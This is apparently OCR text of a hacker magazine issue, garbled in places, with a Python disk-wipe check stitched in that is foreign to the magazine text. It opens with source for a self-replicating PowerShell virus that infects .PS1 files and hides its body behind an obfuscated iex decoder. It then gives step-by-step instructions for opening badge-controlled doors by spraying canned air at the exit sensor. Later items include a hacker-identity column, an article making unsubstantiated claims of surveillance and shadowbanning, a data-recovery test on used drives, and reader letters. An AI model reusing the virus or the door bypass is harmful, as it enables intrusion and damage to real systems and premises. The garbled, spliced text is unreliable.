“$Source -Tail ~$LinesFromTail; 
| Out-File “$Target -append; 
} 


“$InfectedToken = 'echo “"PS Vir_Exl: Redirecting entry point. *"; 
™*SCurrentFilePath = ‘$MyInvocation.MyCommand.Name; *$VirusCodeBody 
= Get-Content $CurrentFilePath -Tail 3'; 


“$AcceptInfectionToken = '#PS_Vir_Exl_Accept_Infection'; 
#echo *$InfectedToken; 
#echo *S$AcceptInfectionToken; 


echo 'PS Vir_Exl: Looking for files to infect.'; 


“$Filelist = dir *.PS1 -name; 
foreach(*$Filename in “$Filelist) { 
*$ScriptStatusToken = Get-Content “$Filename -Head 1; 
if(‘$ScriptStatusToken -eq “$InfectedToken){ *$Msg = 'PS Vir _Exl 
'+°$Filenamet' file already infected'; echo ~$Msg; } 
elseif (*$ScriptStatusToken -eq *$AcceptInfectionToken) {*$Msg = 
"PS_Vir_Exl: '+°$Filename+' file ready for infection!'; echo ~$Msg; 
InfectFile “$CurrentFilePath “$Filename 3 4; ~$Msg = 'PS Vir Exl: 
'+°$Filenamet' file has been infected'; echo “$Msg; break; } 


echo 'PS_Vir_Exl: Code segment executed!';}" 


$ObscuredVCS = PSV_code $VirusCodeSegmentString 
echo $ObscuredVCS 


$VirusDecoderSegmentString = '{echo "PS Vir _Exl: Decoding code segment." 
»;Scodedtext = Get-Content $CurrentFilePath -Tail 1; for($i=1;$i -lt 

™ S$codedtext.length+1; $i+=3){ $letter = ([char[]]$codedtext) [$i]; 

™ Sletter t= ({char[]]$codedtext) [$i+1]; $letter += ([char[]]$codedtext 
>) [S$i+2]; $letter = [char] (300 - [int]$letter); $decodedtext += 
 Sletter} iex "&$decodedtext"}' 


#iex $VirusDecoderSegmentString 

$EntryPointCodeSegmentString = 

"echo "PS _Vir_Exl: Redirecting entry point.";$CurrentFilePath = 
 $MyInvocation.MyCommand.Name; $VirusCodeBody = Get-Content 
™ $CurrentFilePath -Tail 3 


$EntryPointRedirect= $VirusCodeBody[0] 
iex "&SEntryPointRedirect"' 


$EntryPointCodeSegmentString | Out-File ".\generated.PS1" 


"echo 'AFTER EP EXECUTION'" | Out-File ".\generated.PS1" -append 
'$VirusDecoderSegment =' | Out-File ".\generated.PS1" -append 
$VirusDecoderSegmentString | Out-File ".\generated.PS1" -append 


'$VirusCodeSegment = ""' | Out-File ".\generated.PS1" -append 


'#'+$ObscuredVCS | Out-File ".\generated.PS1" -append 


by lg0p89 


To the tune of The Beverly Hillbillies theme: 


Let me tell you about a can of air. 

We used this to break into there. 

The can of air was in the supply closet, 

It just took a four seconds to open the door. 


Air, that is. Human necessity. Smells real good. 


With this simple can, it just took a few seconds 
To enter any secured room, it was sure the ticket. 
From now on, I don't need a damn key 

To get into any office, you won't see me. 


Recently, I came across a rather interesting 
physical attack to gain access to most facilities. 
The attack parameter is pretty basic. This works 
on the doors in facilities that do not require a key 
or badge to be scanned in and out of the area. So 
this works on doors which only require access one 
way (usually in). These doors generally require 
the user as they advance to the door to remove 
their badge and swipe it near the sensor. The door 
may then be opened by the user, presuming the 
user has access. The general layout consists of 
two glass doors, side by side. The badge reader 
is engaged and the doors may be opened after the 
lock is disengaged, allowing the user to be able 
to enter. 

For this attack, the user doesn’t need to be 
on the authorized list, or any list for that matter. 
They don’t need to attempt to piggyback in. All 
the unauthorized user needs is a can of air. They 
can get this from the office supply closet or from 
the local super store for $5. That is it. The user 
has to walk into the building, confident they are 
supposed to be there, and walk past the recep- 
tionist or security station. The confidential aspect 
of the attacker’s swagger is key. They don’t have 
to overly sell it, but just act like the others who 
are supposed to be there. As they approach the 
door to the restricted area, they need approxi- 
mately five seconds to complete the attack, start 
to finish. They should perhaps stand back while 
others pass through the door, or stay away from 
the area until the attacker has time to compromise 
the “lock” unnoticed by anyone on either side of 
the door. 

Once the coast is clear, the attacker pulls the 
can of air (generally used to clean off electronics) 
from their coat or pocket, pushes the red tube into 
the spray nozzle, and holds the can upside down. 
The red tube is placed between the doors or, if 
there is only one, above the door between the 
door and the door entry frame, and sprayed while 
the can is upside down. The spray period may 
be a second, maybe two at the most. The door 
is immediately pulled and opened. Yeah for the 
red team! 


How This Works 

Generally, the glass doors are a valid locking 
mechanism. You have to have a valid badge in 
your possession. This is passed in front of the 
badge reader, using the RF chip in your ID, which 
unlocks the door. The user opens the door and 
starts or continues their day. Pretty boring, I know. 
When someone inside the building attempts to 
leave, they simply walk up to the double doors, 
push, and the doors open. What allows this to 
happen is relatively simple. For ease of use, there 
is not a system in place to badge out. As the doors 
are locked, there has to be some form of a mecha- 
nism to unlock these. It turns out there is a sensor 
above the door. To test this in any building is easy. 
Start walking up to the door. From four meters 
out, start looking above the door. There should be 
an opaque piece of plastic above the door. Keep 
watching this as you walk up. At approximately 
two or three meters, you will hear a clicking noise 
or a red or green light will become lit. With either 
mechanism, the sensor is indicating to you that it 
recognizes an object is close to the door and the 
sensor needs to send a command to the door lock 
to disengage for a limited amount of time, so the 
user is able to exit. This sensor, generally IR, is 
scanning for persons approaching the door, so the 
sensor may send a command to unlock the door. 
The attacker holds the can upside down (this is 
important) and sprays it toward the sensor. 

The important parts of the attack are social 
engineering (fitting in with the others), and 
mechanical (spraying the canned air toward 
the sensor). As the attacker slides the red tube 
through or above the door towards the sensor 
and sprays, the action creates a small cloud. 
The sensor, sending out the IR, reads this as an 
object (or human) proximate to the door. As it is 
supposed to work, the person leaving should pull 
the door and leave. As the attacker is seeking to 
get in, all they have to do is pull the door. It opens 
with ease. 

The entire attack should take all of five 
seconds. This works on most doors. If there is 
a badge reader on both sides of the door (ingress 
and egress), this won’t work. This is surprisingly 
cheap and easily done in a wonderful showcase. 
The Hacker Perspective 


by Brock bynch 


Are hackers born or do they become 
hackers after getting a Sega Dreamcast 
with a GameShark? If you think that’s a 
silly question to ask, please read on and I'll 
take you down a path of wonder, awe, and 
more questions. I began to get my feet wet 
in hacking when I was a teenager. This was 
while many adversities were afflicting my 
life, and I felt like a stereotypical teenage 
hacker rebel. After all, sometimes stereo- 
types are true. Society and life had given 
me a reason to stand up to the system I 
lived in and say, “I’m going to do what I 
want.” 

I started off as an online hacker, 
exploiting flaws in games like Phantasy 
Star Online. There was a vulnerability in the 
game that would allow you to PK (People 
Kill) people in a non-player-versus-player 
area of the game. Now, at the time this was 
a cheap and simple sadistic thrill. There was 
an attack called a Resta spell that would 
take away all of the player’s health points. 
But in order to use it, you had to modify 
a certain hex value in the game. This was 
originally great fun having the power to 
do things that other people couldn’t. But 
as time went on, I learned that the sort of 
hacking I was doing was black hat and, 
more importantly, it was mean and wrong. 

What caused me to lay to rest my old 
ways of black hat exploitation? Well, in 
short, I grew a conscience. They say there 
are many different intelligences people 
can possess. When I was younger hacking 
Phantasy Star Online, the intelligence 
that I didn’t possess was an emotional 
one. However, one day after I had PKed 
someone, something happened to me that 
stood out for the rest of my teen years. 
A person with a more advanced hacking 
method came in and did the same thing to 
me, only worse. I felt powerless and was 
in very deep despair. I thought to myself, 
“Is this all that life amounts to? A dog-eat- 
dog world where there is always a bigger 
fish seeking to devour a smaller weaker 
morsel?” 

As it turned out, that little experience 
inside of a somewhat massively online 
multiplayer game was one of the main 
turning points in my life. It made me see 
that just because someone can do some- 
thing doesn’t mean that they should do it. 
There was also an example I learned by 
watching players that didn’t exploit the 
vulnerabilities in the game. They were in 
essence sitting ducks, but they seemed like 
they were having more fun. In that way, I 
found out that vulnerability is a strength 
rather than a weakness. 

What I realized with my black hat 
hacking pursuits was that it all seemed to 
boil down to control. This mainly stemmed 
from the fact that I felt helpless in real life. 
It seems like if the thrill of being able to 
have control over things leaves you, you 
start seeing things from a more altruistic 
perspective. At least, this is what happened 
to me during my teen years. I left behind 
the shadowy arts of black hat game hacking 
for more benign things that actually helped 
others. These were things like volunteering 
at a local computer recycling shop, and 
helping my mom and grandma with their 
computers. This was where my black hat 
changed to a halo or, more specifically, a 
white hat. Some people never reach the 
level of calling themselves a white hat 
hacker, or they go from white hat to black 
hat. However, like life, hacking has many 
varying shades of gray. 

As stated earlier, the black hat hacking I 
did when I was younger was not without its 
pitfalls. People would get mad at me in the 
game and say some very distressing things. 
This brings me to a big point about life. I 
found that doing the wrong thing was easy 
and took very little effort to gain monetary 
or mood benefits. But, in life, doing the 
right thing is difficult. 

I had this epiphany when I was around 
17 years old, and was walking down the 
street in the city I grew up in. I thought 
about infamous hackers such as Kevin 
Mitnick, and how he was able to recover 
his stance in the world after being locked 
up for social engineering. This is in stark 
contrast to people like Bill Gates who seem 
to always do the right thing. Up until the 
time I found my way, my friends and I 
would participate in questionable hacking 
activities, i.e., building cantennas, trying 
to make virii, and general teenage hacker 
shenanigans. Later, I found out that the 
time I had spent doing these things would 
have probably been better spent looking for 
a job. 

So, what really is a hacker and what do 
they do? People can always look at a hacker 
and say, “They exploit things.” But you 
have to realize that the only way to mend 
a broken bone is by knowing it is broken 
in the first place. Along those same lines, 
the same code that makes us weak also 
makes us strong. If, for instance, you find 
a zero day vulnerability inside of your own 
machine, you could use that for nefarious 
means, or to benefit others by releasing the 
information. In that way, life is proven to 
be both a gift and a curse at times. Hackers 
prove this notion - some hack because they 
feel as though they’re cast down in the 
world. After all, isn’t it a psychological 
tenet of human nature that people who feel 
powerless want to gain power, even by 
force? But in doing so, some have fallen 
further than they ever stood to gain from 
their activities. I’ve heard of many hackers 
on the news getting long jail sentences for 
stealing. This is what changed my mind 
about being a black hat hacker. I learned 
that by doing the right thing, you close up 
the vulnerability within yourself for people 
to act against you. 

Really then, the smart hackers are the 
ones that try to build up their community, 
friends, and family - and not try to break it 
down. Besides, there are other ways to keep 
progressing as a hacker without breaking 
the law. It may not be the most glamorous 
form of hacking to help family or friends 
remove viruses from their machines, but it 
feels way better than exploiting others. 

Other areas, such as open source contri- 
butions over GitHub, would be the primary 
way I see to hone one’s skills and still 
remain in the right by the law. Another way 
would be to create your own home network 
and hack it for fun. I plan on trying both of 
these things in the near future. 

My message to the younger genera- 
tion of hackers out there - and hackers in 
general - is to not view hacking as a polit- 
ical, social, or monetary tool, but mostly 
as a manifestation of self. Without getting 
too deeply into my personal psychological 
analysis of why people hack, I’d say it’s 
mostly because they’re curious. It wouldn’t 
seem proper to say that this curiosity always 
kills the cat. But there are many instances 
of people in history that were too curious 
for their own good. Take Marie Curie, for 
example. I consider her to be a hacker in a 
way, because she was curious about radia- 
tion. She and many other scientists ended 
up getting sick or dying over their experi- 
mentation with radioactive elements. Many 
scientists are hackers because they hold 
knowledge as tantamount to life. And both 
hackers and scientists run experiments, 
although hackers’ experiments often take 
the form of debugging a piece of software. 
We then must be careful that, if we live by 
the hack, we do not also die by it. 

Being a hacker is one of the many things 
I have experienced in my life. There is 
always the person that is purposely vulner- 
able who makes you question the whole 
basis of why you hack, or the person that 
has more skill than you who makes you feel 
like the victim. Going back to the begin- 
ning of the article when I was talking about 
the game Phantasy Star Online, it wasn’t 
playing the game that taught me a lesson. It 
was trying to game the game that taught me 
a lesson. Some lessons in life don’t come 
about no matter how many times you read 
a book or go down the same road. Hacking 
has taught me that, to learn, you must try 
things in novel ways. You must experiment 
with your surroundings and transfer skills 
from one aspect of life to another. I’ve read 
in scientific papers that stepping outside 
your comfort zone is one of the best ways 
to master a new skill. If that is true, then 
hacking must be one of the best ways of 
learning there is. This is because in hacking 
you’re always adapting to a new architec- 
ture, programming language, or platform. 

If you’re an aspiring hacker trying to get 
into the scene, I recommend going down the 
path less traveled. As Smash Mouth sings 
in the famous song “All Star,” “...what’s 
wrong with taking the back streets? You'll 
never know if you don’t go.” So shine in 
whatever path you choose to take in hack- 
erdom, whether you’re simply hacking 
together a spreadsheet or getting paid to 
pen test some vulnerability in Google. To 
me, the exceptional hacker is the one who 
spends the most time on a seemingly trivial 
facet of something others overlook. After 
all, while everyone else is using Python 
for an artificial neural network, you can 
be the brave explorer who attempts to use 
PHP for the same endeavor. At least, that’s 
what I’m doing. We don’t learn in life by 
doing the same thing as everyone else. To 
be an exceptional hacker, my advice is to 
step outside of your comfort zone and do 
something new. 

There have been many good things that 
have come about because I hacked things 
when I was younger. I was able to get my 
information technology associate degree 
with relative ease. This involved taking 
“Fundamentals of Programming” and 
“Web Design Basics” classes, which were 
already right up my alley. Also, whenever 
I see a problem, hacking has given me the 
insight to know that there is always more 
than one way to skin a catfish. Yes, the 
skills I learned in hacking are translatable 
to other areas of life. That’s why you don’t 
always need the right tool for the right job. 
What is needed, instead, is the right mind 
for the right job. 

If this article finds its way amongst 
the other great articles I’ve read in 2600 
Magazine over the years, I hope it helps 
someone. I’ve tried to incorporate some life 
lessons I’ve learned from being a hacker. 
Sometimes the lessons were harsh and 
other times they were easy. But in the end, 
“hacker” is just a word. The word means 
many different things to many different 
people. I ask that if you’re reading this and 
have a negative view of hackers, that you 
realize that we are people too. Some of us 
even have lives. We're not always the bad 
guys that the media portrays as stealing 
massive amounts of information online. 
We are sons, daughters, fathers, grandfathers, 
and most importantly, we are human 
beings. We vary as greatly as the life on our 
planet, and we are curious enough about 
life to teach you a thing or two about what 
we’ve learned along the way. 

To this day, the author remains a hacker 
and curious about the world around him. 
He recently earned an Associate’s in information 
technology and continues to use his 
knowledge for good, rather than bad. 


We're looking for a few good columns 
to fill our pages for the next bunch of issues. 
Think you have what it takes? You might 
surprise yourself. “Hacker Perspective” is 
a column that focuses on the true meaning 
of hacking, as spoken in the words of our 
readers. We want to hear YOUR stories, 
ideas, and opinions. 

The column should be between 2000 and 
2500 words and answer such questions as: 
What is a hacker? How did you become one? 
What experiences and adventures did you live 
through? What message can you give to other 
aspiring hackers? These questions are just our 
suggestions - feel free to answer any others 
that you feel are important in the world of 
hackers. 

If we print your piece, we'll pay you 
$500, no questions asked (except where 
to send the $500). Send your submissions 
to articles@2600.com (with “Hacker 
Perspective” in the subject) or to our mailing 
address at 2600, PO Box 99, Middle Island, 
NY 11953 USA. 

Submissions only open every few years so 
don’t delay! 
by Michaleen Garda 
michaleen.garda@gmail.com 


At the beginning of this year, I decided to 
try my hand at Twitter. I had been avoiding 
it for some time, but I wanted to see what all 
the fuss was about and, being retired, I have 
plenty of time on my hands. Being a professor 
of media studies, I became most interested in 
the Twitter feeds for The New York Times, The 
Wall Street Journal, The Hill, The Washington 
Post, The Economist, Foreign Affairs (the 
primary publication of the Council on Foreign 
Relations), and every other major English 
language newspaper in the world. 

To my pleasant surprise, I found that 
Twitter was a wonderful way to write “letters 
to the editor” about inappropriate headlines 
or content, and the responses and followers 
I quickly began to gain because of my little 
tweets was very gratifying. Apparently, I had 
found something that I was very good at and 
people from all “sides” took great interest in 
my daily media critiques. 

Perhaps my newfound power went to my 
head, or perhaps I was merely exploring the 
extent of this Twitter system, but before too 
long I noticed that some of these publications 
actually began changing their headlines 
immediately after I had pointed out their blatant bias. 
At first this was very sneaky, as by changing 
their headline after I had commented on it, it 
was made to look like my comments made no 
sense at all. Further examination proved that 
it is common practice on all these feeds to 
repost stories that they feel the need to “POV 
push,” but with different headlines, sometimes 
different lead pictures, and naturally no old 
comments. But the story was identical. After 
I started cataloging these propagandist prac- 
tices, I once counted 15 different reposts of the 
same story on CFR with 15 different headlines. 
Was our media really lacking ideas to such an 
extent that they needed to repost so frequently, 
or were these repostings always the subject 
matter that their organization desired pushed 
to the public the most? Wouldn’t any respect- 
able media organization only write one story 
and let it speak for itself? 

As flattering as it was that headlines were 
daily being changed based solely on one old 
man’s editorial opinion, things proceeded to 
get weirder. Drunk with my newfound power I 
decided to seek out the “most powerful people 
on earth” on Twitter and see what I had now 
come to see as their propaganda. I began with 
the Council on Foreign Relations, but moved 
on to people like Bill Gates and Jeff Bezos. 

Even on their own Twitter page, CFR main- 
tains a list of their ally corporations and it’s 
hard to deny that their consistent policy against 
green energy comes from the fact that all their 
allies are gas, oil, and nuclear companies. 

Well, I still don’t know what happened, but 
apparently these people fight back and fight 
back hard against what I now assume they 
view as “information warfare,” because tweets 
of mine kept disappearing and many of my 
followers began complaining that they were 
not able to see my tweets at all, or replies to 
tweets. The very rapid rate of follower accu- 
mulation slowed to a trickle. A little bit of 
research informed me there is an open secret 
on Twitter known as “shadowbanning,” the 
fairly common practice of some (yet uniden- 
tified) power to censor and edit any Twitter 
“troublemakers.” Once shadowbanned, it 
is nearly impossible to get your rights and 
freedom back. I was very proud of the edito- 
rial work I had done and many others were as 
well. I had not used profanity, trolling, or any 
partisanship whatsoever. I simply like to speak 
truth to power, but apparently power does not 
like that at all. Completely at a loss, a young 
techie friend taught me how to download the 
complete archive of my work on Twitter and, 
once accomplished, I was very much relieved 
to see all my hard work still documented in my 
private archive. I still have this archive, backed 
up in multiple locations (though the copy I 
kept on my person on USB was stolen from my 
bag as I slept), but what came next causes me 
to be very careful about how exactly I should 
use this data. 

Because my account had become “compro- 
mised” by forces unknown, and Twitter 
support was unable or unwilling to do anything 
about it, I contacted a younger colleague (Jake) 
who is more of a techie than I am and charged 
him with focusing on CFR to see if they were 
the main aggressors. For their mistakes, half- 
truths, biases, and outright lies are incredibly 
easy to see through. Jake began his experiment 
and, in no time at all, he also was shadowbanned. 
I had no idea that censorship was so 
alive and well in the 21st century. 

But Jake had worse news for me. While 
investigating my home network, he discovered 
that every router hop after my ISP was obfuscated 
immediately after being passed to my 
ISP and, when attempting to SSH to a reliable 
shell, we received the warning that a “man in 
the middle” attack was taking place. A further 
clue was a visit to thepiratebay which suddenly 
had zero leechers and zero seeders. Patently 
impossible, unless our MITM was blocking 
peer-to-peer. Soon enough, Jake’s laptop was 
spectacularly hacked, bricking it, by inserting 
a virus into the RAM as far as we can tell. 
When he tried to download a new distro image 
of Ubuntu Linux, the download would not 
complete. When he tried to download a distro 
of Kali Linux, the download completed but 
the GPG keys did not match. Clearly someone 
very advanced was fussing with us, and not 
above giving us a pre-rootkit install distro of 
Kali. 

Without getting into too much detail, things 
continued to escalate until he was approached, 
on multiple occasions, by actual humans - 
some threatening, some complimentary, all of 
them strangers and all of them very ominous. 
I stayed at my remote farm, but the interroga- 
tions I received from anonymous Twitter users 
escalated drastically and were nothing less 
than professional: one even directly threatened 
the life of a young grandniece of mine and 
threatened me with “police torture.” 

Some innocent, “protected by the First 
Amendment” activities on Twitter had 
devolved in three months to secret censor- 
ship, illegal computer security breaches, and 
human operatives. At a total loss, we contacted 
first the FBI and later filed a complete report 
with the DOJ’s IC3 computer crimes division, 
including screenshots of the various tracer- 
outes which proved our data was being consis- 
tently manipulated in very strange ways. None 
of these to date has had any meaningful effect. 
Neither did trying to work with my ISP. After 
three different “engineers,” none of whom 
could perform a basic traceroute command or 
explain why they were routing all of our data to 
servers with obfuscated IP addresses (though 
they could not deny that this was exactly what 
was occurring), the final “engineer” got very 
belligerent with us for even mentioning the 
National Security Agency. “You can’t just say 
‘NSA!!’” he sputtered indignantly. 

What did I learn from all this? A hypoth- 
esis I call “meme control.” I have come to 
view World War Three as largely a battle of 
information and memes. A battle for control 
of minds. Those with the power to censor 
Twitter (identically with those who use the 
same power to censor Wikipedia) are doing so 
because they know that the meme is one of the 
most powerful information viruses known to 
humankind. And someone is in the business of 
creating and maintaining “approved” memes 
for the public. “Dangerous” memes are inves- 
tigated and neutralized. Imagine if just one 
Twitter user was able to easily unite different 
viewpoints and elucidate clearly the program 
of propaganda and mind control that is so 
clearly in use in our mass media. Imagine he 
got a billion followers. Now imagine he is an 
“anarchist.” This situation is simply untenable 
to those in power, and they have my sympathy 
for this position, but the fact that this “shad- 
owbanning” is secret is a very real problem. 
And that forces are willing to send out paid 
human operatives to investigate, intimidate, 
and dissuade simple Twitter users is an even 
bigger problem. 

I am incredibly proud of the work I did 
on Twitter, yet a glance at my profile today 
shows almost nothing. Everything good has 
been completely erased, and several tweets 
added that I certainly never submitted. The 
vast majority of my Internet accounts were 
hacked and passwords changed, including the 
account I used to submit my first article which 
appeared in 2600 entitled “Hack(ed) The 
Earth.” I had no idea when I wrote that how 
very prophetic it was. 
by Michaleen Garda 
michaleen.garda@gmail.com 




Online Thrift Stores Have Your Data 


by base64xor 


When it is decided that a PC or laptop is no longer of use, do individuals and organizations dispose 
of the system and its hard drives, or resell them? A review of online offers shows that some decide 
to resell or donate the system or drives to a thrift reseller. 

Perhaps you have used a computer or uploaded a file to a computer of a friend or family member, 
at a library, a photo kiosk, a print store, or other fine establishments. When those systems are of 
no use, the system or hard drives from that system may be donated to a thrift store. You may have 
personal data at risk of exposure to others unknown to you and outside of your control. 

So are hard drives that are sold by a thrift reseller routinely wiped of all data? Could one buy 
hard drives from an online thrift store and then recover files from the hard drive? To determine how 
easy it is to recover files from used drives bought at a thrift store, I decided to buy a few hard drives 
online and attempt to recover data. 

To start off this research, I picked a popular website that sells hard drives from locations around 
the country. I selected two older Western Digital drives that were offered from a thrift store in South 
Florida. I purchased the two drives for $21 including shipping and handling. 

Description: WD Caviar SE 250GB & 320GB Desktop Hard Drives 

Brand: Western Digital 

Condition: No visible damages. Items tested and formatted multiple times 

Partition Table Type: MBR 

File System Type: NTFS 

The online description of the hard drives stated the drives were “formatted several times,” so 
perhaps the data was wiped before the drives were placed for sale. But of course, formatting does 
not erase data. In order to temporarily connect the drives externally to a computer, I purchased a 
USB to SATA cable kit at an online store for under $10. 

I needed the kit in order to connect the drives to an older iMac of mine that is running the 
Ubuntu Mate Linux distribution. When the drives arrived, I connected the first drive to my iMac. 
The cable kit worked, and the Ubuntu Mate system recognized the hard drive. 

The Linux file explorer displayed an empty folder for the hard drive. Nothing there, no files 
present! So I needed to install a program designed to recover deleted data. In order to attempt data 
recovery from the hard drives, I installed the program foremost which allows for recovery of 
deleted files from a device or disk image. 

The command that I ran to install foremost: 

sudo apt-get install foremost 

After the program was installed, I then ran a foremost command to recover office files: 

sudo foremost -v -t ole -i /dev/sdb1 

Foremost ran for one hour and 18 minutes, and created a directory called “output” with subdirectories 
of file types and the “audit.txt” file. The program recovered 123 office files. Since the 
recovery of the office files answers my question as to whether the disk was wiped, I did not attempt 
to recover additional file types. 

Extracted from the Audit file: 


File: /dev/sdb1 
Start: Tue Nov 13 18:22:14 2018 
Length: 232 GB (250058113024 bytes) 


Finish: Tue Nov 13 19:40:42 2018 
123 FILES EXTRACTED 


I disconnected the first drive and then connected the second drive to my iMac. Once again, the 
system displayed an empty folder when I first connected the drive. I then ran the same foremost 
command to recover office files, and the program ran for two hours and 40 minutes, recovering 
1321 office files. 

Extracted from the Audit file: 


File: /dev/sdb1 
Start: Thu Nov 15 04:18:50 2018 


Finish: Thu Nov 15 06:58:14 2018 
1321 FILES EXTRACTED 
ole:= 1321 


So from this research, I found that online thrift stores may sell hard drives that are not zeroed 
of all data. I was able to recover office files from both hard drives. In order to ensure that all data is 
wiped from a hard drive, a program must be used which writes data across the entire disk several 
times. Such a program is usually described as meeting U.S. government specifications for erasing 
digital data from storage devices. In this case, the drives were not wiped of data and I demonstrated 
how easy it is to recover files. 

So think twice before you use a computer system that is not or will not remain under your direct 
and personal control until the hard drives are either destroyed or properly wiped of data. 
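
A pre-disposal check for the point made above, that formatting leaves file contents on the disk: this added example (not the author's code) models a format on a small constructed image, looks for the OLE2 compound-file header that marks legacy office documents, and shows that only a full overwrite clears it. The image layout, the function names, and the simplification that a format rewrites only the first eight sectors are assumptions made for the illustration.

```python
"""Pre-disposal check on a constructed disk image: does a 'format' leave data behind?"""
import os
import tempfile

# Header of an OLE2 compound file (legacy .doc/.xls/.ppt), i.e. the "office files" type.
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")
SECTOR = 512
CHUNK = 2048 * SECTOR  # 1 MiB reads, always a whole number of sectors


def scan_image(path):
    """Return (nonzero_sector_count, offsets of sectors that begin with OLE_MAGIC)."""
    nonzero, hits, base = 0, [], 0
    with open(path, "rb") as f:
        while True:
            chunk = f.read(CHUNK)
            if not chunk:
                break
            for i in range(0, len(chunk), SECTOR):
                sector = chunk[i:i + SECTOR]
                if sector.count(0) == len(sector):
                    continue  # sector is all zeros
                nonzero += 1
                # Assumption: file data starts on a sector boundary, as it does
                # when a file system allocates whole clusters.
                if sector.startswith(OLE_MAGIC):
                    hits.append(base + i)
            base += len(chunk)
    return nonzero, hits


def build_sample_image(path, sectors=64):
    """Constructed sample: fake file-system metadata plus one fake office document."""
    image = bytearray(sectors * SECTOR)
    image[0:SECTOR] = b"FAKE-FS-METADATA".ljust(SECTOR, b"\x01")
    doc = OLE_MAGIC + b"constructed payroll.xls contents " * 40
    start = 16 * SECTOR
    image[start:start + len(doc)] = doc
    with open(path, "wb") as f:
        f.write(image)
    return start


def quick_format(path, metadata_sectors=8):
    """Simplified model of a format: rewrite the metadata area, leave data sectors alone."""
    with open(path, "r+b") as f:
        f.write(bytes(metadata_sectors * SECTOR))


def overwrite_image(path, passes=3):
    """Write across the whole image several times; the last pass is zeros so it can be verified."""
    with open(path, "r+b") as f:
        size = f.seek(0, os.SEEK_END)
        for n in range(passes):
            final = n == passes - 1
            f.seek(0)
            remaining = size
            while remaining:
                step = min(CHUNK, remaining)
                f.write(bytes(step) if final else os.urandom(step))
                remaining -= step
            f.flush()
            os.fsync(f.fileno())


def demo():
    """Scan the sample image as built, after the modelled format, and after the overwrite."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "drive.img")
        start = build_sample_image(path)
        results = {"original": scan_image(path)}
        quick_format(path)
        results["formatted"] = scan_image(path)
        overwrite_image(path)
        results["overwritten"] = scan_image(path)
    return start, results


if __name__ == "__main__":
    start, results = demo()
    for stage, (nonzero, hits) in results.items():
        print(f"{stage:12s} nonzero sectors: {nonzero:3d}  OLE headers at: {hits}")
```

The same `scan_image` check can be pointed at a real device node read-only before a drive leaves your hands; anything other than zero non-zero sectors means the wipe did not cover the whole disk.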

Observations 
Dear 2600: 

I'm amazed that you're still around! Reality 
caught up with you. I knew 2600 and was it Richard 
Goldstein who ran it back when I had a couple of 
programs on WBAI in New York City in the 1980s 
and we were both looking at similar events happen- 
ing? 

Go well. 

Bill 

Well, some of that resembles the truth. But thanks 
for the sentiment. (And how exactly did reality catch 
up with us?) 

Dear 2600: 

The “Meetings” section of the latest edition 
(36:2) seems to contain some silliness that I am un- 
fortunately familiar with; specifically the message 
from “Sebastien.” 

I recently experienced the joy of opening UTF- 
8 encoded CSVs in Excel and having the software 
decide it was meant to be read as Windows-1252 due 
to a lack of byte order mark, so I suspect Microsoft 
is probably somehow to blame for the mangling of 
“Sebastien.” I found this website quite handy when 
I was trying to get some background on the issue: 
www.i18nqa.com/debug/utf8-debug.html. 

Loving the magazine so far - this is my first year 
as a subscriber. 


Erik 

At least we know people are paying attention. 

Dear 2600: 

The recent announcement by Facebook to roll 
out their own virtual currency called “Libra” brings 
a huge question. What are the major downsides to 
having such a currency available to users? Let’s first 
start with a major technology company having con- 
trol over their own currency without having the so- 
called same oversight as major financial institutions 
which can lead to various issues like data breaches, 
volatility, privacy matters, processing of transac- 
tions, etc. 

Data breaches routinely happen within all indus- 
tries anyway, but when a technology company such 
as Facebook (or any social networking site) has plans 
to roll out their own currency, this can be magnified 
since there isn’t the same level of regulation which a 
normal financial institution would experience when 
data gets stolen leading to a potential hardship to a 
customer’s wealth. Secondly, there is much volatil- 
ity regarding virtual currency. Who says it’s going 
to stay stable for users or even potential users in the 
future, since there would be no guarantee it wouldn’t 
decline even a little bit? Users want stable currency 
for financial transactions, not ones which tend to 
fluctuate drastically, either up or down. That’s more 
like playing the stock market instead of relying on 
stable financial transactions. Third, there is the 
of privacy when it comes to such a currency. This, 
of course, has been major news for social network- 
ing platforms already and, by having them offer such 
services, they would be able to further keep tabs/ 
tracking on an individual’s daily financial transac- 
tions leading to less and less privacy to users. 

Social networking platforms should not be in the 
business of financial matters of any kind and could 
lead to many negative results. 


Bill Miller 


Dear 2600: 

I saw this today at Electronic Parts Outlet in 
Houston and thought you might be interested. 
Twelve issues of 2600 for just $30! 


The shrink wrap is a nice touch. But it goes to 
show that those printed issues are always out there 
and will be snatched up by somebody. We're almost 
tempted ourselves. 


2600 Magazine 


Dear 2600: 

You appear to have used my picture in 36:2. On 
the back you state that I will receive a one year sub- 
scription if you use my picture. Is this valid for the 
payphone pictures as well? 


Reader 

Yes, you are correct, we do appear to have done 
exactly that. However, we don't move nearly as fast 
as some people expect insofar as sending out notifi- 
cations. It usually takes a couple of weeks after the 
issue has been released. Sometimes, when all hell 
breaks loose (which has been the case this summer), 
it could take a little longer. But all notifications have 
now been sent out and you should be completely up 
to date (and yes, your payphone photo qualifies). We 
hope you send in more pictures and maybe even an 
article. And we promise to move faster next time. 

Dear 2600: 

In the Summer 2019 issue (36:2), there is an 
article called “Potential VPN Attacks” written by 
someone with the name “aesthetic.” It is very similar 
to mine - so similar, in fact, that I’ve had a couple 
people contact me congratulating me on getting a 
great article published. So just to clarify, I am not 
“aesthetic,” and while I always appreciate a kind 
note, people who liked that article should be thank- 
ing the right person. 


aestetix 

Hacker identity is indeed a complex issue. 

Dear 2600: 

I just finished reading “Let’s Just Call It Bitcon” 
by XtendedWhere in 36:2. Like most people on 
Planet Earth, I’ve read a lot and heard a lot about 
Bitcoin. Never before have I read such an honest and 
insightful view of Bitcoin and “klepto-currencies” 
(as the author calls them). 

It seems that there are truly some flaws with the 
whole system that might be impossible to overcome 
except in the few examples he gives. This article is 
true journalistic excellence and it’s so refreshing to 
see it in the pages of 2600. 

Please keep it up! 


Ron 

Always happy to present divergent opinions. And 
always wanting to see more. 

Dear 2600: 

I wanted to send you all a quick thank-you note 
for publishing my article “Hacking in a Slow Job 
Market” in 35:4. Can you believe I wrote that five 
years ago? I honestly figured it might have been lost, 
buried in a pile of mail, or your editor was disin- 
terested in transcribing my handwriting! Imagine 
my surprise when I received a free issue to my post 
office box! Looking back at the article, I’m not as 
pleased with it as I was when I wrote it, but I did 
learn one important thing from my own article - to 
remember to date any correspondence! Happy hack- 
ing! 

Kamonra 

Five years is pretty extreme, but sometimes 
